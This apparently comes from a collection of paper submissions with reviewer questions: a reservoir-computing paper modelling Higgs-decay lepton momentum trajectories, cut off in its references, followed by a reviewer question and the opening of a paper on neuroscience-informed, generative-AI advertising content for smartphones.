decay is of particular interest in the particle physics community. The most extensive but experimentally challenging is the Higgs decay to b-quarks: \( H \rightarrow bb \) and the extremely rare decay is into four leptons (electrons or muons): \[ H \rightarrow ZZ^* \rightarrow 4l \] (1) Another rarest evidence is of the Higgs boson decaying to two leptons (either an electron or muon pair with opposite charge) and a photon. More information on the Higgs Boson decay equations are available in the Appendix. In our experiments we use equation (1) where the Higgs Boson decays into four leptons. **Dataset Description:** For this study we used the Higgs candidate event database [McCauley (2014)] which provides a selection of Higgs candidate events. These events consist of an invariant mass falling within the range of 120-130 GeV, as made available by CMS. These events were selected and validated by the CMS Higgs Physics Analysis Group. The dataset comprises 10 gamma-gamma events, one 2e2mu event, one 4mu event, and one 4e event. Our dataset contained 3 Higgs candidate events (invariant mass between 120-130 GeV), where Higgs decays to four leptons. As input we provide the components of the momentum of the lepton (GeV) (px, py and pz variables) to the reservoir pool to learn and track the trajectory of a lepton [Jomhari (2014)]. **Related Work:** Higgs Boson decay using classical Machine learning (ML) has been studied in [Jung et al. (2022); Cepeda et al. (2022)] for probing exotic decay purpose. ML based methods have gained traction in processing data at particle colliders. With online filtering of streaming detector measurements, and offline analysis of data once it has been recorded [Denby (1999); Sadowski et al. (2014)]. The ML Classifiers learn to distinguish between different types of collision events by training on simulated data from sophisticated Monte Carlo programs. Most of the existing state-of-the-art attempts have been to detect and classify the decay signals with respect to background signals using classical machine learning and quantum annealing [Mott et al. (2017)] techniques. In [Sadowski et al. (2014)] leverage the power of DNNs to provide the analyses of particle collider data, by learning high-level features from the data increasing the statistical power more than the common high-level features handcrafted by physicists. Non linear system identification using data driven methods is being studied rigorously since the discovery by [Dzeroski & Todorovski (1995)] for reproduction of underlying dynamics geometries and state space properties when there is absence of data by [Brunton et al. (2016); Rudy et al. (2017); Sahoo et al. (2018); Sun et al. (2022)]. But sparsity explorations necessitates carefully defined candidate function library, prior system knowledge. Moreover, a linear combination of candidate functions may be insufficient for recovering complex mathematical expressions, especially aperiodic systems. As the library size increases, it empirically faces challenges in adhering to the sparsity constraint [Sun et al. (2022)]. For Tree search methods in domains with high branching factors and deep search graphs, applying Monte Carlo Tree Search (MCTS) or any standard search algorithm becomes challenging for real-time control, where an organized method to integrate knowledge becomes essential to limit the search to a manageable subtree. Figure 2: The Reservoir-in-Reservoir training phase: a) shows the decay from gluon to Higgs particle that decays further into 4 leptons. b) Each lepton decays further, whose momentum gets tracked in this dataset in x,y,z direction in 3D space. c) The momentum p shown in x (red), y (green) and z (lavender) plane. d) The three individual matrices of momentum \( p(x), p(y), p(z) \) provided to three l-g pairs. e) The reservoir pool receives an input step impulse, the inputs from d) and trains the generators to produce the output from the readout, which is an union of the outputs from each l-g pair. Another complication arises when simulations demand significant CPU resources, and MCTS faces learning from a limited number of samples. Learning DS using RNNs have been proposed in Roweis & Ghahramani (2001); Lu et al. (2017); Duncker et al. (2019) based on inferring posterior over latent trajectories given a time sequence, but are harder to train, high memory intensive and exhibit minimal attractor tuning in case of aperiodically evolving DS. In the following sections, we describe the datasets used to learn the lepton momentum trajectory from Higgs Boson decay candidate events, provide a comprehensive architectural overview of a novel real-time learning and optimization approach in RC tailored to address the challenges posed by the modeling of unknown, data-driven aperiodic nonlinear systems. We follow it by discussing the results obtained and the observations we make with our rationale for the same. 2 METHODS 2.0.1 TRAINING THE RESERVOIR POOL: We first introduce the initialization and training procedure of the reservoir pool, for which we must focus on the architecture of Figure 2. We conduct a search space exploration to find the optimal reservoir size inside the pool, the window size each learner-generator pair must process for optimal performance among other parameters using Algorithm 3 described in the Appendix section. Important to note here is that the pool can be initialized to any number of learner-generator pairs inside it, given the task we are opting to learn. In our case the optimal number of learner-generator pairs obtained by the architecture exploration were three. Each pair received three time windows each of length 2000 steps for training each time. Once the reservoir architecture search yields the system-specific optimal window length, reservoir size for the learner generator pairs, appropriate forgetting factor for specific time windows, the reservoir pool is initialized with an architecture similar to part e) of Figure 2. The activities of the pairs are given by [3]. As shown in part e) of Figure 2, the reservoir pool is initialized with learner-generator (l-g) pairs of \( L_i \), where \( i = 1, 2, 3 \) and 'n' in Figure 2 stands for 3 in our experiments (based on our architecture space exploration). The learners in each pair are initialized using equation [1] in [1]. The reservoir pool is excited by a unit impulse. This unit impulse \( u_{in} \) coupled with input weights \( w_{in} \) excites each reservoir in each pair. It is important to note here that this is the only excitation that the generator reservoir receives, but that is not the case for the learner reservoir in the pair. The learner reservoir obtains a secondary input, which is the time... window of the system we are trying to learn. In our case this is the x-y-z trajectory of the lepton momentum (part d in [2]). Instead of a single value each time step, the learner receives three values \( p(x), p(y) \) and \( p(z) \) each timestep. This delivers the ground truth into the pool through a vector of weights \( w_{out} \). The components of both input weights are chosen from a uniform distribution between -1 and 1. Unlike state-of-the-art reservoir architectures where the ground truth is provided in the form of closed form equations ([Sussillo & Abbott](2009); [DePasquale et al.](2018); [Lu et al.](2017); [Lukoševičius et al.](2012)), in our case this is completely data driven, with no prior knowledge of the system dynamics. Hence this becomes a black box mimicking task or system identification by the reservoir pool, a much less explored area in RC. For the incoming aperiodic momentum trajectory of the lepton, our task is to train the reservoir pool to learn the changes in pattern in real time as shown in Figure 3b) and then mimic the system behavior with a single input impulse. Eventually the generator aims to merge its recurrent activity dynamics with signals representing the ground truth, which can be subsequently extracted by a linear readout in the form of: \[ p'(t) = w_{readout}^T(t)\tanh(X_G)(t) \] where \( p'(t) \) denotes the output momentum at time \( t \). The generator convergence: The neurons inside a reservoir exhibits the chaotic activity given by [15]: \[ \tau \frac{dX_G(t)}{dt} = -X_G(t) + C_G(\tanh(X_G)) + w_{in}u_{in}(t), \] where \( C_G \) is the N-unit connectivity matrix representing the sparse connections inside the reservoir. Its output is given by: \[ Z(t) = w_{readout}^T(\tanh(X_G)(t)) \] Given our objective is to generate activity such that \( z(t) \equiv p(t) \), at time \( t \) during training, before weight update, the error is given by: \[ e_-(t) = C_G(t - \Delta t)(\tanh(X_G) - C_L(\tanh(X_L))) - w_{out}p(t), \] Post weight update this error becomes: \[ e_+(t) = C_G(t)(\tanh(X_G) - C_L(\tanh(X_L))) - w_{out}p(t), \] As \( t \to \infty \), ideally \( e_+(t)/e_-(t) > 1 \) at the end of training. And this is achieved by updating the connectivity matrix inside the generator reservoir by the delta rule ([Stone et al.](1986)): \[ C_G(t) = C_G(t - \Delta t) - e(t)P(t)(\tanh(X_L)), \] where the \( P \) provides multiple learning rates to the presynaptic activity firing rates (\( \tanh(X_L) \)) in each weight update by the following equation: \[ P(t) = \Lambda^{-1}(P(t - \Delta t) - \frac{P(t - \Delta t)\tanh(X_L)(t)\tanh(X_L)^T(t)P(t - \Delta t)}{\Lambda + \tanh(X_L)(t)^TP(t - \Delta t)\tanh(X_L)(t)}). \] where \[ \Lambda = \begin{bmatrix} \lambda_1 & 0 & \cdots & 0 \\ 0 & \lambda_2 & \cdots & 0 \\ \vdots & \vdots & \ddots & \vdots \\ 0 & 0 & \cdots & \lambda_N \end{bmatrix} \] It is to be noted here that \( p(t) \) is our desired output momentum trajectory and \( P(t) \) (\( N \times N \) matrix) is the running estimate of the inverse of the correlation matrix of the reservoir network activity rates scaled with the diagonal matrix of the forgetting factors, which can be expressed as: \( P = (r(t)r^T(t) + \Lambda I)^{-1} \) ([Sussillo & Abbott](2009)). Hence \( e_+ \) can be expressed as: \[ e_+(t) = e_-(t)(1 - (\tanh(X_G)^T(t)P(t)\tanh(X_G)(t))) \] In order to achieve convergence, or end of training, \( (1 - (\tanh(X_G)^T(t)P(t)\tanh(X_G)(t))) \to 1 \) For low aperiodicity of incoming system, the subtrahend variable above may undergo a temporal evolution, initially closely approximating 1 and gradually converging asymptotically to 0 and remains consistently positive throughout the learning process. This behavior signifies a systematic reduction in error magnitude facilitated by weight updates, aligning with the intended learning objective. Ultimately, the ratio \( \lim_{t \to \infty} \frac{e_+(t)}{e_-(t)} \) tends towards 1. \( \Lambda \) is a critical factor in this process and requires meticulous adjustment based on the specific characteristics of the target function. For lower excitation a value closer to 1 enhances the performance of the estimator ([Fortescue et al.](1981)). While in case of high aperiodicity such as this, higher frequency and rapid changes of target function need lower values to promote rapid learning but may introduce instability due to excessively swift weight adjustments. Hence, precise calibration of the forgetting factor is essential to achieve both stability and convergence in the learning process (Vahidi et al., 2005; Sussillo & Abbott, 2009). High aperiodicity of target function increases the activity firing rate. Hence, the variable \((\tanh(X_G)^T(t)P(t)\tanh(X_G)(t))\) can stray away from 0, leading to divergence from target function. Moreover, a very large reservoir size leads to higher instability in such scenarios because of high firing rate due to chaotic reservoir activity. This is where the efficacy of RIR lies in adaptability to incoming system dynamics, learning fewer timesteps at a time, adjusting the forgetting factor to facilitate efficient learning and re-triggering training for a learner-generator pair whenever the output and target diverge beyond threshold as shown in [2]. This ensures a system specific data-driven approach to learning. Our objective lies in adjusting the recurrent connectivity matrix \(C_G\) of each generator reservoir to internally generate signals equivalent to the ground truth time window provided to its respective learner in the pair [20], matching the mixing observed in its learner counterpart when exposed to an external \(p(t)\) input. We aim to align the combination of internal and external signals of the learner \(L_i\) as \(C_{Li}\tanh(X_{Ln}(t)) + w_{out}p_i(t)\), with the internally generated signal in the generator reservoir \(G_i\), \(C_{Gi}\tanh(X_{Gn})\). This alignment is achieved by minimizing a designated cost function given in Equation [18] in [1]. Fundamentally this minimization differs from the classical Recursive Least Squares (RLS) method in the approach to updating the covariance matrix \(P(t)\) (Equation [21]). Within the classical RLS methodology, the covariance gradually converges to zero over time, leading to a loss in its capacity to adeptly capture alterations in parameters. Conversely, as depicted in Equation [21], the covariance matrix is subjected to division by a factor denoted as \(\lambda\) (where \(0.1 \leq \lambda \leq 1.0\)) during each update. This deliberate division process effectively mitigates the rapid dissipation of the covariance matrix. And the value of \(\lambda\) is not arbitrarily selected but chosen by the system during the reservoir architecture search mentioned earlier ([3] in Appendix). The stepwise learning is provided in [1]. ### 2.0.2 Trajectory Pattern generation in real time: In the testing phase, the reservoir pool gets the unit impulse \(u_{in}\) coupled with input weights \(w_{in}\) as the only input trigger to start generating the momentum trajectory. As described in Algorithm [2], now the learner reservoirs are inactive and the generators are initialized with the recurrent connectivity matrix \(C_G\) learnt using [20] during the training phase using RLS with forgetting. Given only an unit --- **Figure 3:** The Reservoir-in-Reservoir testing phase **Table 1:** Model comparison: Mean squared error observed for different network sizes when comparing our architecture to state-of-the-art architectures | Reservoir Size | ESN | FORCE | full-FORCE | Reservoir-in-Reservoir | |----------------|-------|-------|------------|------------------------| | 100 | 15.02 | 13.38 | 2.8 | 2.07 | | 500 | 12.3 | 12.5 | 2.56 | 0.8 | | 1000 | 10.8 | 14.98 | 2.54 | 1.98 | Training phase eigenvalue variation in reservoir pool Figure 4: The normalized eigenvalues before and after learning occurs. a) b) and c) representing generators 1, 2 and 3 respectively. The blue lines show the stabilizing eigenvalues of the recurrent connectivity. y axis is normalized eigen value and x axis is recurrent nodes. Testing phase Re-training a learner in reservoir pool Figure 5: d) showing the trajectory prediction in testing phase post which in e) re-training is triggered re-initializing a learner generator pair but with pre-learned weights, making it stabilize faster than before. impulse, each generator reservoir generates an output in the form given in Equation 2. Given a set of optimal number of trials determined during the reservoir architecture search the NE and MSE is monitored over time. The pool now gets tested on its ability to generate patterns in the time windows assigned to each of them. The whole output is the union of the individual outputs generated by the individual l-g pairs. In our case we defined our threshold > 1. Upon exceeding this threshold the pool initiates an l-g pair to learn the new incoming system following the same steps of [1], except that instead of all l-g pairs being activated, only a single is activated. This keeps the re-training computation simple and less resource heavy. The detailed process to re-trigger training when total error exceeds threshold is available in Algorithm 2. Reservoir-pair Architecture search and optimization: In our neural architecture search, we conducted experiments to find the optimal network size for learner-generator pairs in the reservoir pool, ranging from 100 to 1000 while maintaining a fixed window size. Our main objective was to balance network size and achieve state-of-the-art results, imposing a maximum network size constraint of 1000. Additionally, we explored the impact of forgetting factors (0.1 to 1.0), batch sizes (10 to 50), and the number of trials (10 to 50), enabling us to configure the reservoir pool with suitable network sizes and pairs tailored to specific patterns within a given window. This approach facilitated intelligent selection of the best-performing learner-generator pair during training, allowing real-time retraining, maintaining a compact network size, and enabling effective learning of previously unseen patterns without excessive computational costs or time delays. Model Comparison: Our study evaluated the proposed architecture to SOTA reservoir architectures like ESN, FORCE, and full-FORCE. To ensure a fair comparison, we applied consistent evaluation criteria, testing all architectures with three sets of reservoir network sizes (100, 500, 1000 neurons) [1]. Another reservoir size exploration (500, 650, and 1000 neurons) across 20 trials is presented in the Appendix [4]. Training each model for 20,000 timesteps on momentum trajectory data for a single lepton, we then evaluated their performance on a separate unseen dataset of 10,000 timesteps of unseen trajectory data, while maintaining a forgetting factor of 0.1 in our R-i-R architecture to enhance learning dynamics and adaptability. We also experiment how varying forgetting factor affects the error rate for different reservoir sizes shown in [3] in Appendix. We have used the python 3 to program our learning architecture, the experiments have been run on Google Colab with a 51.0 GB System RAM, the model comparison to system identification algorithm baseline models have been made using the symbolic physics learner repository on Sun et al. (2023). Algorithm 1: Training Learner-Generator reservoirs algorithm Input: Incoming time series sequence from \( t_0 \ldots t_T \) divided into \( n \) windows of (1)\( p_1(t) \)(from time \( t_0 \ldots t_a \)), (2)\( p_2(t) \)(from time \( t_{a+1} \ldots t_b \)), ... (n)\( p_n(t) \)(from time \( t_{y+1} \ldots t_z \)) Initialize reservoir pool with \( n \) reservoirs (\( L_1, L_2, \ldots L_n \)) Requirement: Parameters = (Reservoir size=s, Reservoir time step=dt, forgetting factor=\(\lambda\), batch size=b, trials each batch=trials) for \( i=1,2,\ldots,n \) do \( L_i \) = Initialize each learner reservoir in the pool by the following equation \[ \tau \frac{dX_{Li}(t)}{dt} = -X_{Li} + C_{Li}(\tanh(X_{Li})) + w_{in}u_{in}(t), \] end Begin Parallel Training Step 1 : Instantiate learners by providing input impulse and momentum signal with internal connections \( C = C_L \) \[ \tau \frac{dX_{L1}(t)}{dt} = -X_{L1}(t) + C_{L1}(\tanh(X_{L1})) + w_{in}u_{in}(t) + w_{out}p_1(t), \] \[ \tau \frac{dX_{L2}(t)}{dt} = -X_{L2}(t) + C_{L2}(\tanh(X_{L2})) + w_{in}u_{in}(t) + w_{out}p_2(t), \ldots \] \[ \tau \frac{dX_{Ln}(t)}{dt} = -X_{Ln}(t) + C_{Ln}(\tanh(X_{Ln})) + w_{in}u_{in}(t) + w_{out}p_n(t), \] Step 2 : Instantiate generators in the pool by providing input impulse only with internal connections \( C = C_G \) \[ \tau \frac{dX_{G1}(t)}{dt} = -X_{G1}(t) + C_{G1}(\tanh(X_{G1})) + w_{in}u_{in}(t), \] \[ \tau \frac{dX_{G2}(t)}{dt} = -X_{G2}(t) + C_{G2}(\tanh(X_{G2})(t)) + w_{in}u_{in}(t), \ldots \] \[ \tau \frac{dX_{Gn}(t)}{dt} = -X_{Gn}(t) + C_{Gn}(\tanh(X_{Gn})) + w_{in}u_{in}(t), \] Step 3 : Minimize Cost Function with forgetting factor for each of the above generator reservoir using following equations: \[ V(t) = \frac{1}{2} \sum_{i=1}^{r} \lambda^{r-i}((C_{Gn}(\tanh(X_{Gn})) - C_{Ln}(\tanh(X_{Ln}))) - p_t)^2, \] \[ e(t) = C_{Gn}(t - \Delta t)(\tanh(X_{Gn}) - C_{Ln}(\tanh(X_{Ln})) - w_{out}p_n(t), \] \[ C_{Gn}(t) = C_{Gn}(t - \Delta t) - e(t)P(t)(\tanh(X_{Ln})), \] \[ P(t) = \frac{1}{\lambda}(P(t - \Delta t) - \frac{P(t - \Delta t)\tanh(X_{Ln}(t)\tanh(X_{Ln})^T(t)P(t - \Delta t)}{\lambda + \tanh(X_{Ln}(t))^TP(t - \Delta t)\tanh(X_{Ln}(t))} \] 3 RESULTS AND DISCUSSION Table 1 shows the comparison between our proposed R-i-R architecture to existing reservoir architectures ESN, FORCE, full-FORCE. Our architecture outperforms existing reservoir architectures in MSE evaluated for all three reservoir sizes. While ESN, FORCE and full-FORCE tend to perform better only with larger network sizes, R-i-R is designed to process an incoming system in parts, shared by its consisting l-g pairs. Hence for a given window length and its aperiodicity, R-i-R finds a sweet spot to perform optimally with adaptable forgetting. Larger network sizes in turn increase firing rate activities mentioned in the Methods section. It is to be noted here that our architecture is designed with the objective to reduce computation cost, keep network size to the minimal and yet achieve SOTA results. Table 2 shows the comparison with some SOTA system identification algorithms namely pySindy, GPLearn and MCTS. While pySindy outperforms GPLearn and MCTS, our architecture outperforms all the three. This performance improvement as a data driven approach for system identification, can be partly attributed to its little dependence on prior knowledge of the dynamics of particle decay. Additionally, the re-trigerring of training the l-g pairs with adaptable forgetting depending on changing aperiodicity and firing rates of the recurrent connectivity help keep the overall error rate low. The values of MSE reported are af- Algorithm 2: Generating dynamic system pattern real time algorithm **Begin Testing** **Step 4**: Generate outputs from each reservoir in the pool \[ \text{groundtruth} = p(t...T), \text{totalerror} = 0, \text{totaloutput} = 0, \text{error} = 0, \text{Variance} = 0, \\ \text{totalVariance} = 0, \text{Window} = W_i = 0, \text{Threshold} = \text{threshold}, \text{timelength} = t_l \] for \(i=1,2,...n\) do for trials=1,... trials do \[ p_i'(t) = w_{\text{readout}}^T(\tanh(X_{Gn})(t)) \tag{22} \] \[ \text{error} = \text{error} + (p_i'(t) - p_i(t))^T(p_i'(t) - p_i(t)) \tag{23} \] \[ \text{Variance} = \text{Variance} + p_i(t)^Tp_i(t) \tag{24} \] end \(NE_i = \text{error}/\text{Variance}\) \(W_i = W_i \cup p_i(t_0...tl)\) end \[ \text{totaloutput} = W_i \] \[ \text{totalerror} = \text{totalerror} + (\text{totaloutput} - \text{groundtruth})^T(\text{totaloutput} - \text{groundtruth}) \] \[ \text{totalVariance} = \text{totalVariance} + \text{groundtruth}^T\text{groundtruth} \] \(NE = \text{totalerror}/\text{Variance}\) if \(NE > \text{Threshold}\) then Load \(L_k,G_k\) Learner-Generator reservoir pair \(k\) is determined based on which generator \((G_k)\) obtains lowest NE in previous steps of testing call Training end ter 10 trials each. This goes on to establish that this architecture shows promise in adaptative real time system identification with a much lower memory requirement than a library driven or tree search based approach. In Figure 4, the transformations in the recurrent connectivity matrix \((C_G)\) within the generator reservoirs are observed before and after training, with a focus on its original form \((C_L)\). Initially, the eigenvalues of \(C_L\) are predominantly clustered within a wide region of -4 to 2. After training, they converge within a smaller region of -2 and 1, with fewer than 500 recurrent nodes. Learner reservoirs with real parts initially exceeding 1 tend to gravitate towards real parts closer to 0 during the learning process, consistent with the earlier mentioned stabilization attribute. In testing phase, no alterations in the internal connectivity of the generator reservoirs takes place and only upon exceeding an error threshold, l-g pair is reactivated. This results in alterations to the existing eigenvalues, as depicted in subplot e) in Figure 3, but the convergence occurs much earlier, with approximately 350 recurrent nodes, ensuring comprehensive real-time stability. ### 4 Conclusion Our novel RC paradigm representing an ML driven particle physics system identification, to elucidate Higgs Boson decay phenomena reveals that conventional RLS-driven loss function minimization may have limitations in achieving real-time adaptability to space-time varying nonlinear dynamic systems. We introduce a vector forgetting-based covariance matrix update tailored to mitigate covariance wind-up. Our R-i-R architecture pioneers real-time adaptability in data driven black-box learning context, offering significant network size reduction and enhanced performance. Upon acceptance, we will open-source our code-base for reproducibility, facilitating further insights and exploration of complex decay trajectories and parameters beyond lepton momentum. | Algorithm | MSE | |----------------------------------|-------| | Reservoir-in-Reservoir (Ours) | 0.87 | | pySindy [Brunton et al., 2016] | 71.99 | | GPlearn [Ferreira et al., 2019] | 72.014| | Monte Carlo Tree Search [Sun et al., 2022] | 72.009| Table 2: Mean Squared Error obtained from benchmarking with state-of-the-art system identification algorithms. Each metric obtained by 10 trials REFERENCES Georges Aad, Tatevik Abajyan, B Abbott, J Abdallah, S Abdel Khalek, Ahmed Ali Abdelalim, R Aben, B Abi, M Aiolins, OS AbouZeid, et al. Observation of a new particle in the search for the standard model higgs boson with the atlas detector at the lhc. *Physics Letters B*, 716(1):1–29, 2012. Flavio Abreu Araujo, Mathieu Riou, Jacob Torrejon, Sumito Tsunegi, Damien Querlioz, Kay Yakushiji, Akio Fukushima, Hitoshi Kubota, Shinji Yuasa, Mark D Stiles, et al. Role of non-linear data processing on speech recognition task in the framework of reservoir computing. *Scientific reports*, 10(1):328, 2020. Fedor Bezrukov. The higgs field as an inflaton. *Classical and Quantum Gravity*, 30(21):214001, 2013. Stephen A Billings. *Nonlinear system identification: NARMAX methods in the time, frequency, and spatio-temporal domains*. John Wiley & Sons, 2013. Cameron B Browne, Edward Powley, Daniel Whitehouse, Simon M Lucas, Peter I Cowling, Philipp Rohlfshagen, Stephen Tavener, Diego Perez, Spyridon Samothrakis, and Simon Colton. A survey of monte carlo tree search methods. *IEEE Transactions on Computational Intelligence and AI in games*, 4(1):1–43, 2012. O Brüning, H Burkhardt, and S Myers. The large hadron collider. *Progress in Particle and Nuclear Physics*, 67(3):705–734, 2012. Steven L Brunton, Joshua L Proctor, and J Nathan Kutz. Sparse identification of nonlinear dynamics with control (sindyc). *IFAC-PapersOnLine*, 49(18):710–715, 2016. Linda Carpenter, Anthony DiFranzo, Michael Mullhearn, Chase Shimmin, Sean Tulin, and Daniel Whiteson. Mono-higgs-boson: A new collider probe of dark matter. *Physical Review D*, 89(7):075017, 2014. María Cepeda, Stefania Gori, Verena Ingrid Martinez Outschoorn, and Jessie Shelton. Exotic higgs decays. *Annual Review of Nuclear and Particle Science*, 72:119–149, 2022. CMS Collaboration cms-publication-committee-chair@ cern. ch. A portrait of the higgs boson by the cms experiment ten years after the discovery. *Nature*, 607(7917):60–68, 2022. Cms Collaboration et al. Observation of a new boson at a mass of 125 gev with the cms experiment at the lhc. *arXiv preprint arXiv:1207.7235*, 2012. Glen Cowan. Review of particle physics. *Phys. Rev. D*, 86(010001):390, 2012. Bruce Denby. Neural networks in high energy physics: a ten year perspective. *Computer Physics Communications*, 119(2-3):219–231, 1999. Brian DePasquale, Christopher J Cueva, Kanaka Rajan, G Sean Escola, and LF Abbott. full-force: A target-based method for training recurrent networks. *PloS one*, 13(2):e0191527, 2018. Lea Duncker, Gergo Bohner, Julien Boussard, and Maneesh Sahani. Learning interpretable continuous-time models of latent stochastic dynamical systems. In *International Conference on Machine Learning*, pp. 1726–1734. PMLR, 2019. Saso Dzeroski and Ljupco Todorovski. Discovering dynamics: from inductive logic programming to machine discovery. *Journal of Intelligent Information Systems*, 4:89–108, 1995. Jimena Ferreira, Martín Pedemonte, and Ana I Torres. A genetic programming approach for construction of surrogate models. In *Computer Aided Chemical Engineering*, volume 47, pp. 451–456. Elsevier, 2019. TR Fortescue, Lester S Kershenbaum, and B Erik Ydstie. Implementation of self-tuning regulators with variable forgetting factors. *Automatica*, 17(6):831–835, 1981.
eR4W9tnJoZ
How is this study different from previous efforts studying the use of neuromarketing methods vs. plain advertisements like the ones shown to the participants (plain background with the product in the middle)? Is the novelty of the work the use of ChatGPT to generate the ad creatives?
VISUO-EMOTIONAL PERCEPTION AND HUMAN COGNITION TO ENGINEER CONTENT-GENERATION USING GENERATIVE AI Anonymous authors Paper under double-blind review ABSTRACT Media platforms compete for users’ attention. Their reach crucially depends on algorithmic real-time bidding and efficiency of hyper-personalised, rapidly generated, and user-optimised content. Attention is, however, a scare and fleeting quantity, often awarded less than 1 second per stimulus. Thus, the current strategy is to rely on the vast amount of user-generated data to mimic the content to the user. The underlying assumption is that this is sufficient incentive for attention. This strategy has evidently failed, as witnessed by the alarmingly low or short-lived successes of campaigns in recent times. This mismatch is exacerbated because most content consumed today is digital, whereas strategies for digital content mimic our past understanding of mass-media. Hence, we formalise a new understanding of communication, specifically for the digital media. We prove that the digital medium demands a new understanding of communication protocols. Hence, we take a first principles approach to the new communication protocol: the neurological representations of communication, specifically, where the communication happens in less than 1 second per stimulus. First, we break down and elaborate on this neurological representation of decision-making. Next, we propose use of our behavioural communication model for generation and optimisation of content creatives. To that end, we elaborate methods for rapid, AI-generated content, increasing the efficiency of visual communication on digital media. Within this exploration we include themes of Hyperpersonalisation and Search-engine optimisation. Thus, we find that strategically produced content exhibits stronger associations to users’ nonconscious needs, wants and goals, which elicits user attention and content-diversity significantly. 1 INTRODUCTION In the book Subprime Attention Crisis, Tim Hwang highlights the ineffectiveness of digital advertising. He calls digital advertising “the beating heart of the Internet”, but one that is about to collapse. The author compares the Click-Through Rates (CTRs) of the first digital ad that was released in 1994 to the click-through rates on digital advertising in 2018. The famous “You Will” ad (Figure. 1) was released on the popular tech-blog hotwired.com (now Wired.com). Over the next two months, the ad garnered a CTR of 44%, i.e., one in two people who saw the ad, clicked on it. A CTR of 44% is unheard of today when the average for display ads lingers at sub-1% (0.48% in 2018, 0.35% in 2022). Hence, digital communication today is over a 100-times less effective than it was 20 years ago (Marino, 2023; Hwang, 2020). ![First ad seen on hotwired.com](image) Figure 1: First digital ad in the world. The ineffectiveness warrants technological interventions such as: - Real-Time Bidding, - Ad Personalation or Targeted Ads, - Search-Engine, and - Dynamic Content Optimization 1.1 Past Methods of Personalisation To improve the effectiveness of digital ads, in 2014, Google deployed real-time bidding for its ad spaces. Real-time bidding allows advertisers to manage and optimise ads from multiple ad-networks, enabling them to create and launch campaigns via an instantaneous programmatic auction. In other words, the viewer is exposed to “the right product, at the right time”. Search engine optimisation also aims to optimise online content by keywords. The principle of SEO is that there is direct, increasing correlation between the number of keywords in the content and the probability that the content will be clicked-on and consumed. A third method that is used to present “the right content at the right time” is personalisation. Personalisation in communication aims to make communication relevant to the user by incorporating elements of the user’s identity into the content or creatives. With personalised ads, also called targeted ads, consumer insights increase the relevancy of the ads presented to the consumer (Meta). While the war for users’ attention wages on delivering precisely and accurately, CTRs continue to decline, from 0.48% in 2018 to 0.35% in 2022. The average Cost per Click (CPC) and Cost per Impression (CPI) of display ads continue to rise, hence the conclusion that online ads mostly fail to work (Marino, 2023). 1.2 The Adoption of Generative AI Generative AI methods are evolving rapidly and using text-to-image diffusion models is making it possible to generate images simply based on text input (Ramesh et al., 2022; Rombach et al., 2022; Saharia et al., 2022). This alone has shown incredible promise in scaling up the effort to create visual content at incredible speeds. However, one of the fallacies of technological advancement is there is often uncertainty in adopting it for large-scale use. Most recently we saw this with the development of the COVID vaccine. Discovery and scaling production of the COVID-19 vaccines was done in record time (Boyle, 2021). But there was still significant hesitation globally to “take the shot”. When we observe the widespread adoption of simpler technologies like the hesitance linked to the recent COVID-19 vaccination, or the problem of open defecation in rural India despite the access to clean toilets, it warrants anticipation that the adoption of AI-based Image Generation should go beyond experimental and recreational use and a short-lived hype (Boyle, 2021; Sharma, 2021). Technology giants such as Google and Microsoft are also not immune to this, having dozens of product failures under the name of Google Graveyard and Microsoft Morgue, respectively (Google McCracken, 2012). In this paper, we marry Text-To-Image generation with the centuries-old practice of visual storytelling to create truly compelling creatives. Indeed, one of the first areas of research was visual perception and how the brain processes and represents visuals, even those generated by AI (Churchland et al., 1994). We look at how to utilise Text-To-Image generation as an effective storytelling tool with the significant advantage of using Gen AI to illustrate stories. Algorithmic personalisation such as dynamic-content optimisation and contextual multi-arm bandit approaches strengthen the prospect of leveraging Generative AI at an unprecedented scale. 1.3 MicroStimuli for the Digital Medium In addition to the art and science of storytelling, most communication today is through the digital medium, specifically smartphones. The human brain has evolved over 600 million years. Hence, it makes sense that the human brain most often resorts to perceptual behaviours stemming from how our early hominid ancestors interacted with their environment (Bennett [2021]). Radio, Television, the Internet, Smartphones, in fact, most modern technology, and what we classify as digital media, emerged only in the last 100 years. Since the launch of the smartphone in 2007, it has been the spearheading medium of the new digital revolution. As of 2023, there are recorded estimates of 6.84 billion smartphones being used around the world (Howarth [2023]). The global smartphone penetration rates are estimated at 67% with an annual growth rate of 10% per year (Howarth [2023]). With the sheer omnipresence of the smartphone, it has become the final mile for all digital interactions. Hence, this paper focuses on the use of GenAI through the lens of the digital medium of smartphones. Recent studies have come to show that the context-duration on digital mediums is fleeting. Similar studies by Netflix and Facebook have shown the duration of digital decisions to be 1.7 seconds and 1.8 seconds, respectively (FacebookIQ | Netflix). To solve the problem of the ineffectiveness of creative content in the digital medium, this paper investigates facets of the neuroscience of decision-making, in the (digital) medium. Understanding the processes in the brain gives us insights into what information is crucial and for firing which decision process in the brain. Identifying these constituents would allow us to design appropriate stimuli that might create the desired response. We propose that this integration of neuroscience and Generative artificial intelligence can help influence smarter, better decisions, such as the adoption of important behaviours such as medical adherence, physical inactivity, and night brushing. In addition, we see applications of the proposed schema in digital marketing of simpler goods and services by increasing CTRs and conversions: the specific areas of focus in this paper. 1.4 TO SOLVE THE PROBLEM WE START WITH THE MEDIUM Studies conducted across different demographics and age groups show an upward trend in the time spent using a smartphone every single day. Earlier studies found that people use their phones on average for about 3 hours and 36 minutes (Anonymous [2023]). But while the time spent on our phones increases, there is a key interaction metric: the touches on the smartphone screen. In 2016, a study reported that people touch their phones 2617 times in a day (dsc). A more recent study, in 2023, found the new number of touches per day to be 4513 (Anonymous [2023]). The increased frequency of touches hypothesizes a dramatic drop in the time for which any content stays on the screen, where each editorial content on the screen, is in front of the user for a very short duration. To understand the editorial context duration of the smartphone medium, this study recorded the touch interval data from smartphone users. The data indicated that 90% of consecutive touches happened in less than 5 seconds and 95% happened in less than 10 seconds (Anonymous [2023]). This indicates that the editorial context duration of the smartphone is only 5-10 seconds. In comparison, the context duration of the television medium is 5-21 minutes (Cha et al. [2008]). For television, a 30-second commercials fit into the subset of the large context duration. However, on smartphones, with a limited context duration window of 5-10 seconds, we need a persuasion stimulus that creates an impact in milliseconds, a MicroStimuli (Anonymous [2023]). While the concept of MicroStimuli operating in milliseconds on smartphones may seem novel to the conscious mind, it is actually a prevalent aspect of Nature that has been evolving for billions of years. The pioneering work of Nobel laureate Nikolaas Tinbergen has illuminated the concept of Supernormal Stimuli (Tinbergen [2020]). Tinbergen’s research revealed how these stimuli possess the remarkable ability to induce fixed action patterns in organisms within mere milliseconds. For instance, male stickleback fish exhibit aggressive behaviours toward the red coloration of a competing male’s 